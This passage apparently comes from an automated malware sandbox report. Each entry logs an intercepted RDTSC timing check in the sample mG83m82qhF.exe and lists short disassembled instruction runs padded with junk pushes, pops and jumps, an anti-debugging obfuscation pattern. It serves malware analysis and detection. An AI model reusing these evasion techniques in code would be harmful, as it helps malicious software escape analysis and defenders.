                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48C02AA second address: 48C02B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48C02B2 second address: 48C035C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c jmp 00007F06687C5EF2h 0x00000011 pushfd 0x00000012 jmp 00007F06687C5EF2h 0x00000017 sub cx, 02E8h 0x0000001c jmp 00007F06687C5EEBh 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 mov cl, bh 0x00000027 mov cx, C6D7h 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F06687C5EF8h 0x00000034 jmp 00007F06687C5EF5h 0x00000039 popfd 0x0000003a call 00007F06687C5EF0h 0x0000003f mov ax, 4E31h 0x00000043 pop eax 0x00000044 popad 0x00000045 mov ebp, esp 0x00000047 pushad 0x00000048 popad 0x00000049 mov edx, dword ptr [ebp+0Ch] 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F06687C5EEEh 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48C0395 second address: 48C0399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48C0399 second address: 48C039D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48C039D second address: 48C03A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0891 second address: 48E0896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0896 second address: 48E08A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E08A3 second address: 48E08AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, di 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E08AB second address: 48E08E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0668FAD206h 0x00000009 adc esi, 2A89B108h 0x0000000f jmp 00007F0668FAD1FBh 0x00000014 popfd 0x00000015 mov si, EB7Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E08E7 second address: 48E08ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E08ED second address: 48E096F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0668FAD204h 0x00000009 and ecx, 07F56698h 0x0000000f jmp 00007F0668FAD1FBh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F0668FAD208h 0x0000001b adc eax, 0A2810F8h 0x00000021 jmp 00007F0668FAD1FBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007F0668FAD202h 0x00000035 and ecx, 583F6B58h 0x0000003b jmp 00007F0668FAD1FBh 0x00000040 popfd 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E096F second address: 48E09BE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 005D280Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, 36h 0x0000000b popad 0x0000000c push ebp 0x0000000d jmp 00007F06687C5EECh 0x00000012 mov dword ptr [esp], ecx 0x00000015 jmp 00007F06687C5EF0h 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c mov edi, esi 0x0000001e pushad 0x0000001f push eax 0x00000020 pop edi 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007F06687C5EF0h 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov bl, 3Fh 0x0000002f mov cl, B0h 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E09BE second address: 48E0A22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 258Dh 0x00000007 call 00007F0668FAD1FAh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 lea eax, dword ptr [ebp-04h] 0x00000013 jmp 00007F0668FAD201h 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F0668FAD203h 0x00000022 and ch, FFFFFF9Eh 0x00000025 jmp 00007F0668FAD209h 0x0000002a popfd 0x0000002b mov ecx, 076BAF67h 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0A22 second address: 48E0A3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06687C5EF8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0A3E second address: 48E0A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0A42 second address: 48E0A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06687C5EEDh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0A5A second address: 48E0A69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0A69 second address: 48E0A7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0A7A second address: 48E0AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0668FAD1FDh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0AFD second address: 48E0B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0B90 second address: 48E0BBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0668FAD205h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0BBC second address: 48E0BFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007F06687C5EEEh 0x0000000f leave 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F06687C5EF7h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0BFA second address: 48D016D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 8B8Ah 0x00000007 mov dx, D656h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e retn 0004h 0x00000011 nop 0x00000012 cmp eax, 00000000h 0x00000015 setne al 0x00000018 jmp 00007F0668FAD1F2h 0x0000001a xor ebx, ebx 0x0000001c test al, 01h 0x0000001e jne 00007F0668FAD1F7h 0x00000020 sub esp, 04h 0x00000023 mov dword ptr [esp], 0000000Dh 0x0000002a call 00007F066D43A93Bh 0x0000002f mov edi, edi 0x00000031 pushad 0x00000032 mov ecx, 3FB3092Bh 0x00000037 mov edi, eax 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b jmp 00007F0668FAD1FAh 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D016D second address: 48D0171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0171 second address: 48D018D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D018D second address: 48D020E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop edi 0x0000000e pushfd 0x0000000f jmp 00007F06687C5EEEh 0x00000014 and si, 3178h 0x00000019 jmp 00007F06687C5EEBh 0x0000001e popfd 0x0000001f popad 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 jmp 00007F06687C5EF5h 0x00000028 sub esp, 2Ch 0x0000002b jmp 00007F06687C5EEEh 0x00000030 xchg eax, ebx 0x00000031 jmp 00007F06687C5EF0h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F06687C5EEDh 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D020E second address: 48D0223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0223 second address: 48D0246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 6299E862h 0x00000008 mov edi, 4B3228AEh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F06687C5EF0h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0246 second address: 48D024C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D024C second address: 48D0250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0250 second address: 48D026A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D026A second address: 48D026E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D026E second address: 48D0274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0274 second address: 48D0298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06687C5EF0h 0x00000008 mov ax, 0E21h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 mov di, ax 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D02EA second address: 48D02F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0668FAD1FAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D02F8 second address: 48D02FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D02FC second address: 48D03D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc ebx 0x00000009 jmp 00007F0668FAD207h 0x0000000e test al, al 0x00000010 pushad 0x00000011 call 00007F0668FAD200h 0x00000016 pushfd 0x00000017 jmp 00007F0668FAD202h 0x0000001c jmp 00007F0668FAD205h 0x00000021 popfd 0x00000022 pop esi 0x00000023 popad 0x00000024 je 00007F0668FAD410h 0x0000002a pushad 0x0000002b mov bx, 82E0h 0x0000002f mov dx, ED0Ch 0x00000033 popad 0x00000034 lea ecx, dword ptr [ebp-14h] 0x00000037 pushad 0x00000038 jmp 00007F0668FAD201h 0x0000003d push ecx 0x0000003e pushfd 0x0000003f jmp 00007F0668FAD207h 0x00000044 and ch, 0000006Eh 0x00000047 jmp 00007F0668FAD209h 0x0000004c popfd 0x0000004d pop esi 0x0000004e popad 0x0000004f mov dword ptr [ebp-14h], edi 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F0668FAD209h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D03D7 second address: 48D03EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0407 second address: 48D0449 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F0668FAD1FEh 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F0668FAD1FCh 0x00000016 popad 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0449 second address: 48D044F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0504 second address: 48D051D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov esi, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F0668FAD25Bh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 mov ebx, 3B80BB06h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D051D second address: 48D05EE instructions: 0x00000000 rdtsc 0x00000002 call 00007F06687C5EF7h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F06687C5EF9h 0x0000000f popad 0x00000010 cmp dword ptr [ebp-14h], edi 0x00000013 jmp 00007F06687C5EEEh 0x00000018 jne 00007F06DAF83E1Dh 0x0000001e jmp 00007F06687C5EF0h 0x00000023 mov ebx, dword ptr [ebp+08h] 0x00000026 pushad 0x00000027 mov ebx, esi 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c pushfd 0x0000002d jmp 00007F06687C5EF6h 0x00000032 sub ecx, 32E4C998h 0x00000038 jmp 00007F06687C5EEBh 0x0000003d popfd 0x0000003e popad 0x0000003f popad 0x00000040 lea eax, dword ptr [ebp-2Ch] 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F06687C5EEBh 0x0000004c sub cl, 0000005Eh 0x0000004f jmp 00007F06687C5EF9h 0x00000054 popfd 0x00000055 jmp 00007F06687C5EF0h 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D05EE second address: 48D05F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D05F4 second address: 48D0629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F06687C5EF2h 0x00000012 jmp 00007F06687C5EF5h 0x00000017 popfd 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0629 second address: 48D0632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0632 second address: 48D067A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], esi 0x00000009 pushad 0x0000000a mov cx, B6FBh 0x0000000e movzx esi, bx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F06687C5EF5h 0x0000001c or ax, BCB6h 0x00000021 jmp 00007F06687C5EF1h 0x00000026 popfd 0x00000027 mov cx, C2A7h 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D067A second address: 48D0698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d mov al, E2h 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ebx, 508356FAh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0698 second address: 48D06B9 instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F06687C5EF4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D06B9 second address: 48D06C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0668FAD1FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D06C8 second address: 48D06CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D06CE second address: 48D06D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D06D2 second address: 48D070E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F06687C5EF8h 0x00000014 or ecx, 2E8F06F8h 0x0000001a jmp 00007F06687C5EEBh 0x0000001f popfd 0x00000020 mov ch, 94h 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D070E second address: 48D0714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0765 second address: 48D0775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06687C5EECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0775 second address: 48D0779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0779 second address: 48D07B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a jmp 00007F06687C5EF7h 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F06687C5EF5h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D07B3 second address: 48D005B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F06DB76B092h 0x0000000c xor eax, eax 0x0000000e jmp 00007F0668F8692Ah 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 leave 0x00000017 retn 0004h 0x0000001a nop 0x0000001b xor ebx, ebx 0x0000001d cmp eax, 00000000h 0x00000020 je 00007F0668FAD353h 0x00000026 call 00007F066D43A67Dh 0x0000002b mov edi, edi 0x0000002d pushad 0x0000002e jmp 00007F0668FAD1FBh 0x00000033 push eax 0x00000034 mov ax, dx 0x00000037 pop edi 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a pushad 0x0000003b mov edi, 1C63DD6Eh 0x00000040 popad 0x00000041 push eax 0x00000042 jmp 00007F0668FAD204h 0x00000047 xchg eax, ebp 0x00000048 jmp 00007F0668FAD200h 0x0000004d mov ebp, esp 0x0000004f jmp 00007F0668FAD200h 0x00000054 xchg eax, ecx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D005B second address: 48D005F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D005F second address: 48D0065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0065 second address: 48D009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 95E1h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F06687C5EF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 call 00007F06687C5EF0h 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D009C second address: 48D00BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 jmp 00007F0668FAD1FDh 0x0000000d mov dword ptr [ebp-04h], 55534552h 0x00000014 pushad 0x00000015 mov ebx, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 mov cl, AEh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0105 second address: 48D0115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06687C5EECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0115 second address: 48D0119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0C52 second address: 48D0CE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06687C5EF1h 0x00000009 or cl, FFFFFFA6h 0x0000000c jmp 00007F06687C5EF1h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F06687C5EF0h 0x00000018 adc ecx, 6E1E9148h 0x0000001e jmp 00007F06687C5EEBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F06687C5EEBh 0x00000031 xor cl, FFFFFF8Eh 0x00000034 jmp 00007F06687C5EF9h 0x00000039 popfd 0x0000003a call 00007F06687C5EF0h 0x0000003f pop eax 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0CE1 second address: 48D0CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0CE7 second address: 48D0CEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0CEB second address: 48D0CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48D0CFB second address: 48D0D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
